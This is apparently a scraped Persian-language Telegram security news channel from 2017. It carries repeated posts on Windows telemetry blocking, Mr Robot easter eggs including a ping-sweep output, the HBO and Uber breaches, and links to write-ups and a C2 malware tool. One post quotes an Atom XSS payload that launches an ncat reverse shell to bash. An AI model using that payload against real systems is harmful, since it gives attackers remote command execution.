جلوگیری از جاسوسی ویندوز ۱۰ با تغییر در فایل هاست و رجیستری
https://github.com/WindowsLies/BlockWindows
#windows
#telemetry
#spy
@sec_nerd
https://github.com/WindowsLies/BlockWindows
#windows
#telemetry
#spy
@sec_nerd
GitHub
GitHub - WindowsLies/BlockWindows: Stop Windows 10 Nagging and Spying. Works with Win7-10
Stop Windows 10 Nagging and Spying. Works with Win7-10 - WindowsLies/BlockWindows
امنیت اطلاعات
Mr_Robot_S03E06_eps3_5_kill_pr0cess.mkv
کلید GPG مورد استفاده الیوت در این قسمت 9C2FA3D1
https://pgp.mit.edu/pks/lookup?op=get&search=0xB178523B9C2FA3D1
#mr_robot
@sec_nerd
https://pgp.mit.edu/pks/lookup?op=get&search=0xB178523B9C2FA3D1
#mr_robot
@sec_nerd
امنیت اطلاعات
Mr_Robot_S03E06_eps3_5_kill_pr0cess.mkv
اسکن رنج آی پی مورد استفاده در این سریال:
nmap -sP 192.251.68.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-21 15:50 +0330
Nmap scan report for 192.251.68.218 irrelevant
Host is up (0.32s latency).
Nmap scan report for 192.251.68.223 (https://compute.e-corp-usa.com)
Host is up (0.30s latency).
Nmap scan report for 192.251.68.224 (https://y8agrfx3.bxjyb2jvda.net/) virtual linux machine
Host is up (0.31s latency).
Nmap scan report for 192.251.68.229 (https://yac9cl78.bxjyb2jvda.net/) upsadmin putty! jalebe!
Host is up (0.32s latency).
Nmap scan report for 192.251.68.232 (https://ycg67gca.bxjyb2jvda.net) kibana panel used in e-corp
Host is up (0.32s latency).
Nmap scan report for 192.251.68.233 (https://yakkqwhz.bxjyb2jvda.net/) frankBowman
Host is up (0.34s latency).
Nmap scan report for 192.251.68.234 (https://yakkqwhz.bxjyb2jvda.net/) frankBowman
Host is up (0.34s latency).
Nmap scan report for 192.251.68.238 (https://y9bukwer.bxjyb2jvda.net/) Live IP Camera
Host is up (0.31s latency).
Nmap scan report for 192.251.68.239 (https://i239.bxjyb2jvda.net/) fsociety ransom page
Host is up (0.32s latency).
Nmap scan report for 192.251.68.240 (https://irc.colo-solutions.net/) fsociety IRC channel
Host is up (0.32s latency).
Nmap scan report for 192.251.68.241 (https://www.conficturaindustries.com/) looks irrelevant
Host is up (0.32s latency).
Nmap scan report for 192.251.68.242 (https://i242.bxjyb2jvda.net/) UPS admin putty (ups_fw_patch.zip here)
Host is up (0.33s latency).
Nmap scan report for 192.251.68.243 (https://i243.bxjyb2jvda.net/) kali linux connects to mobley android
Host is up (0.33s latency).
Nmap scan report for 192.251.68.244 irrelevant
Host is up (0.33s latency).
Nmap scan report for 192.251.68.245 (https://i245.bxjyb2jvda.net/) some oldschool screen
Host is up (0.33s latency).
Nmap scan report for 192.251.68.246 (https://i246.bxjyb2jvda.net/) Elliot tools
Host is up (0.33s latency).
Nmap scan report for 192.251.68.247 (https://i247.bxjyb2jvda.net) mimikatz
Host is up (0.34s latency).
Nmap scan report for 192.251.68.248 irrelevant
Host is up (0.34s latency).
Nmap scan report for 192.251.68.249 irc channel
Host is up (0.34s latency).
Nmap scan report for 192.251.68.250 ransom page
Host is up (0.34s latency).
Nmap scan report for 192.251.68.251 irrelevant
Host is up (0.34s latency).
Nmap scan report for 192.251.68.252 irrelevant
Host is up (0.35s latency).
Nmap scan report for 192.251.68.253 irc channel
Host is up (0.35s latency).
Nmap scan report for 192.251.68.254 ransom page
Host is up (0.35s latency).
Nmap done: 256 IP addresses (24 hosts up) scanned in 52.97 seconds
#mr_robot
@sec_nerd
nmap -sP 192.251.68.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-21 15:50 +0330
Nmap scan report for 192.251.68.218 irrelevant
Host is up (0.32s latency).
Nmap scan report for 192.251.68.223 (https://compute.e-corp-usa.com)
Host is up (0.30s latency).
Nmap scan report for 192.251.68.224 (https://y8agrfx3.bxjyb2jvda.net/) virtual linux machine
Host is up (0.31s latency).
Nmap scan report for 192.251.68.229 (https://yac9cl78.bxjyb2jvda.net/) upsadmin putty! jalebe!
Host is up (0.32s latency).
Nmap scan report for 192.251.68.232 (https://ycg67gca.bxjyb2jvda.net) kibana panel used in e-corp
Host is up (0.32s latency).
Nmap scan report for 192.251.68.233 (https://yakkqwhz.bxjyb2jvda.net/) frankBowman
Host is up (0.34s latency).
Nmap scan report for 192.251.68.234 (https://yakkqwhz.bxjyb2jvda.net/) frankBowman
Host is up (0.34s latency).
Nmap scan report for 192.251.68.238 (https://y9bukwer.bxjyb2jvda.net/) Live IP Camera
Host is up (0.31s latency).
Nmap scan report for 192.251.68.239 (https://i239.bxjyb2jvda.net/) fsociety ransom page
Host is up (0.32s latency).
Nmap scan report for 192.251.68.240 (https://irc.colo-solutions.net/) fsociety IRC channel
Host is up (0.32s latency).
Nmap scan report for 192.251.68.241 (https://www.conficturaindustries.com/) looks irrelevant
Host is up (0.32s latency).
Nmap scan report for 192.251.68.242 (https://i242.bxjyb2jvda.net/) UPS admin putty (ups_fw_patch.zip here)
Host is up (0.33s latency).
Nmap scan report for 192.251.68.243 (https://i243.bxjyb2jvda.net/) kali linux connects to mobley android
Host is up (0.33s latency).
Nmap scan report for 192.251.68.244 irrelevant
Host is up (0.33s latency).
Nmap scan report for 192.251.68.245 (https://i245.bxjyb2jvda.net/) some oldschool screen
Host is up (0.33s latency).
Nmap scan report for 192.251.68.246 (https://i246.bxjyb2jvda.net/) Elliot tools
Host is up (0.33s latency).
Nmap scan report for 192.251.68.247 (https://i247.bxjyb2jvda.net) mimikatz
Host is up (0.34s latency).
Nmap scan report for 192.251.68.248 irrelevant
Host is up (0.34s latency).
Nmap scan report for 192.251.68.249 irc channel
Host is up (0.34s latency).
Nmap scan report for 192.251.68.250 ransom page
Host is up (0.34s latency).
Nmap scan report for 192.251.68.251 irrelevant
Host is up (0.34s latency).
Nmap scan report for 192.251.68.252 irrelevant
Host is up (0.35s latency).
Nmap scan report for 192.251.68.253 irc channel
Host is up (0.35s latency).
Nmap scan report for 192.251.68.254 ransom page
Host is up (0.35s latency).
Nmap done: 256 IP addresses (24 hosts up) scanned in 52.97 seconds
#mr_robot
@sec_nerd
تمپلیت html رایگان StarAdmin
https://github.com/BootstrapDash/StarAdmin-Free-Bootstrap-Admin-Template
#html
#template
@sec_nerd
https://github.com/BootstrapDash/StarAdmin-Free-Bootstrap-Admin-Template
#html
#template
@sec_nerd
امنیت اطلاعات
دادگستری آمریکا با متهم کردن یک ایرانی به نام «بهزاد مصری» به هک کردن شبکه رایانهای شرکت سازنده سریال «بازی تاج و تخت» و سرقت قسمتهای منتشر نشده آن، وی را تحت پیگرد قرار داد. منبع : فارس #news #iran #usa #breach #got7 @sec_nerd
Iranian Behzad Mesri charged in HBO hack, ‘Game of Thrones’ script theft
بهزاد مصری به عنوان عضوی از گروه هکری Turk Black Hat Security توسط دادگستری ایالات متحده به عنوان مجرم معرفی و تحت پیگرد قرار گرفت.
این تیم با ادعای nbc برای ارتش ایران علیه اسراییل اقدام به حملات سایبری کرده است.
@sec_nerd
هک شبکه HBO در دادگاه ارتباطی به دولت ایران پیدا نکرده و مصری به صورت شخصی این حمله را صورت داده است.
این هکر موفق شد با نفوذ به حساب کارکنان کمپانی HBO چهار قسمت از فصل هفت سریال Game of Thrones را بدست آورد.
https://www.nbcnews.com/news/world/iranian-behzad-mesri-charged-hbo-hack-game-thrones-script-theft-n822831
پست های مرتبط در زمان وقوع این حمله که در کانال پوشش داده شد:
https://t.iss.one/sec_nerd/414
https://t.iss.one/sec_nerd/443
https://t.iss.one/sec_nerd/464
#hbo
#got7
#iran
#usa
@sec_nerd
بهزاد مصری به عنوان عضوی از گروه هکری Turk Black Hat Security توسط دادگستری ایالات متحده به عنوان مجرم معرفی و تحت پیگرد قرار گرفت.
این تیم با ادعای nbc برای ارتش ایران علیه اسراییل اقدام به حملات سایبری کرده است.
@sec_nerd
هک شبکه HBO در دادگاه ارتباطی به دولت ایران پیدا نکرده و مصری به صورت شخصی این حمله را صورت داده است.
این هکر موفق شد با نفوذ به حساب کارکنان کمپانی HBO چهار قسمت از فصل هفت سریال Game of Thrones را بدست آورد.
https://www.nbcnews.com/news/world/iranian-behzad-mesri-charged-hbo-hack-game-thrones-script-theft-n822831
پست های مرتبط در زمان وقوع این حمله که در کانال پوشش داده شد:
https://t.iss.one/sec_nerd/414
https://t.iss.one/sec_nerd/443
https://t.iss.one/sec_nerd/464
#hbo
#got7
#iran
#usa
@sec_nerd
NBC News
The feds say an Iranian hacked HBO and stole "Game of Thrones" material
Mesri allegedly launched a campaign in May to gain access to HBO's servers through employee user accounts, and then got his hands on new episodes of hit shows.
گوگل اطلاعات مکان گوشی را حتی زمانی که GPS خاموش است جمع آوری میکند!
https://bit.ly/2A11WzM
#google
#android
#spy
@sec_nerd
https://bit.ly/2A11WzM
#android
#spy
@sec_nerd
امنیت اطلاعات
در سیستم ماهواره ای کشتی های جهان به نام SATCOM حساب مخفی کشف شد. این سیستم که بر روی کشتی ها نصب شده است دارای یک حساب کاربری مخفی با سطح دسترسی ادمین و یک باگ SQLi در فرم لاگین می باشد. https://www.bleepingcomputer.com/news/security/backdoor-account-found…
اجرای OSINT برای سیستم کنترل کشتی ها که چندی پیش مورد نفوذ قرار گرفت + شناسایی افراد
https://www.pentestpartners.com/security-blog/osint-from-ship-satcoms/
#breach
#ship
#backdoor
#satcom
#osint
@sec_nerd
https://www.pentestpartners.com/security-blog/osint-from-ship-satcoms/
#breach
#ship
#backdoor
#satcom
#osint
@sec_nerd
Pen Test Partners
OSINT from ship satcoms | Pen Test Partners
I gave a talk in Athens recently to a number of shipping lines about infosec. One thing that struck me were the similarities between the challenges maritime cyber is facing now and the challenges industrial controls security in utilities started addressing…
This media is not supported in your browser
VIEW IN TELEGRAM
بیش از ۴۰۰ وبسایت بزرگ موس و کیبورد شما را ضبط میکنند!
https://bit.ly/2zudtdS
#trackers
#privacy
@sec_nerd
https://bit.ly/2zudtdS
#trackers
#privacy
@sec_nerd
ابزار تبدیل پروسه مرورگر به عنوان واسط برقراری ارتباط بدافزار با سرور C2
https://github.com/Arno0x/WSC2
#c2
#malware
#botnet
@sec_nerd
https://github.com/Arno0x/WSC2
#c2
#malware
#botnet
@sec_nerd
امنیت اطلاعات
باگ xss در برنامه atom که منجر به اجرای دستور از راه دور میشود! <script> https://window.top .require('child_process').execFile('/usr/bin/xterm',['-e', 'ncat 127.0.0.1 4242 -e /bin/bash']); </script> #atom #rce #xss #dev @sec_Nerd
*XSS via different extensions
*SSI in IIS
*RCE in IIS
https://mike-n1.github.io/ExtensionsOverview
#writeup
#xss
#rce
@sec_nerd
*SSI in IIS
*RCE in IIS
https://mike-n1.github.io/ExtensionsOverview
#writeup
#xss
#rce
@sec_nerd
شرکت uber در سال ۲۰۱۶ مورد نفوذ قرار گرفت و اطلاعات شخصی شامل نام، آدرس و شماره تلفن 57 میلیون کاربر این سایت توسط هکرها سرقت شد.
این شرکت برای رسانه ای نکردن این موضوع مبلغ صد هزار دلار به هکرها پرداخت کرد!
https://www.grahamcluley.com/uber-hackers-paid-data-breach/
#uber
#breach
#ransom
@sec_nerd
این شرکت برای رسانه ای نکردن این موضوع مبلغ صد هزار دلار به هکرها پرداخت کرد!
https://www.grahamcluley.com/uber-hackers-paid-data-breach/
#uber
#breach
#ransom
@sec_nerd
Graham Cluley
Uber paid hackers $100,000 to keep data breach quiet
You can ask forgiveness for being hacked, but many people will find it harder to forgive and forget if you deliberately concealed the truth from them.
H1-212 2017: Writeup
رایت آپ با موضوع نفوذ به وب
https://zeta-two.com/ctf/2017/11/20/h1212-writeup.html
#writeup
#ssrf
#web
@sec_nerd
رایت آپ با موضوع نفوذ به وب
https://zeta-two.com/ctf/2017/11/20/h1212-writeup.html
#writeup
#ssrf
#web
@sec_nerd
Zeta-Two
H1-212 2017: Writeup
Hackerone is hosting an event in New York this december and ran a CTF as a secondary way to get an invite to the event.I visited the H1-702 event in Las Vega...
امنیت اطلاعات
Iranian Behzad Mesri charged in HBO hack, ‘Game of Thrones’ script theft بهزاد مصری به عنوان عضوی از گروه هکری Turk Black Hat Security توسط دادگستری ایالات متحده به عنوان مجرم معرفی و تحت پیگرد قرار گرفت. این تیم با ادعای nbc برای ارتش ایران علیه اسراییل…
گزارش فوربس در مورد این هکر و مطالبی که به نقل از فردی به نام کالین اندرسون ، محققی که در دانشگاه کارنگی ملون واشنگتن برروی قابلیتهای سایبری ایران کار میکند!
در ادامه به تناقضات موجود در این گزارش که هر شخصی (حتی با اطلاعات کم از حملات سایبری) را به فکر فرو میبرد، اشاره خواهیم کرد
1-مصری برای سیستم نظامی ایران کار کرده و شبکه های نظامی،هسته ای و زیرساختهای اسراییلی را هدف قرار داده است .
2-کالین اندرسون اشاره میکند که مصری تحت عنوان نام Skot vahshat برای گروه هکرهای TBH اقدام به دیفیس وب سایت میکرده و با احتمال زیاد این حملات با تکنیک های معمولی که تحت عنوان SQL injection شناخته میشوند اهداف را دیفیس کرده است!
3-مصری در فعالیتهای خود ملاحظات امنیتی را مراعات نمیکرده است. زیرا اقدام به درج ایمیل خود در صفحات دیفیس کرده و آدرس وی نیز در اطلاعات کاربری وی در جیمیل موجود است.
4-مصری شبکه HBO را اسکن کرده و به دنبال نقطه ضعفی برای ورود بوده و موفق شده بصورت ریموت وارد حساب کاربری کارکنان و سپس شبکه داخلی شود.این اتفاق بین ماه های می و جولای رخ داده است و اون توانسته اطلاعات شبکه های داخلی این شرکت اعم از قسمتهایی از سریال GOT و شوهای تلویزیونی مانند Curb Your Enthusiasm و The Deuce را نیز بدست آورد!
5-آدام میرز از CrowdStrike نیز گفته است «دلیلی وجود ندارد که باور کنیم این شخص یک هکر نخبه بوده است!»
6-باز هم با نقل قول از میرز میگوید: ایران کره شمالی نیست،ایرانی بودن این فرد دلیلی بر نقش حکومت ایران در این حمله نمیباشد. (کره شمالی پیش از این کمپانی سونی را هک کرده بود)
https://www.forbes.com/sites/thomasbrewster/2017/11/21/basic-hacker-or-elite-cyber-spy-feds-say-this-iranian-tried-to-extort-hbo-for-6bn/
#hbo
#got7
#iran
#usa
@sec_nerd
در ادامه به تناقضات موجود در این گزارش که هر شخصی (حتی با اطلاعات کم از حملات سایبری) را به فکر فرو میبرد، اشاره خواهیم کرد
1-مصری برای سیستم نظامی ایران کار کرده و شبکه های نظامی،هسته ای و زیرساختهای اسراییلی را هدف قرار داده است .
2-کالین اندرسون اشاره میکند که مصری تحت عنوان نام Skot vahshat برای گروه هکرهای TBH اقدام به دیفیس وب سایت میکرده و با احتمال زیاد این حملات با تکنیک های معمولی که تحت عنوان SQL injection شناخته میشوند اهداف را دیفیس کرده است!
3-مصری در فعالیتهای خود ملاحظات امنیتی را مراعات نمیکرده است. زیرا اقدام به درج ایمیل خود در صفحات دیفیس کرده و آدرس وی نیز در اطلاعات کاربری وی در جیمیل موجود است.
4-مصری شبکه HBO را اسکن کرده و به دنبال نقطه ضعفی برای ورود بوده و موفق شده بصورت ریموت وارد حساب کاربری کارکنان و سپس شبکه داخلی شود.این اتفاق بین ماه های می و جولای رخ داده است و اون توانسته اطلاعات شبکه های داخلی این شرکت اعم از قسمتهایی از سریال GOT و شوهای تلویزیونی مانند Curb Your Enthusiasm و The Deuce را نیز بدست آورد!
5-آدام میرز از CrowdStrike نیز گفته است «دلیلی وجود ندارد که باور کنیم این شخص یک هکر نخبه بوده است!»
6-باز هم با نقل قول از میرز میگوید: ایران کره شمالی نیست،ایرانی بودن این فرد دلیلی بر نقش حکومت ایران در این حمله نمیباشد. (کره شمالی پیش از این کمپانی سونی را هک کرده بود)
https://www.forbes.com/sites/thomasbrewster/2017/11/21/basic-hacker-or-elite-cyber-spy-feds-say-this-iranian-tried-to-extort-hbo-for-6bn/
#hbo
#got7
#iran
#usa
@sec_nerd
Forbes
Feds Say This Iranian Hacker Tried To Extort HBO For $6 Million -- Here's What We Know About Him
Here's everything we know about the alleged HBO hacker...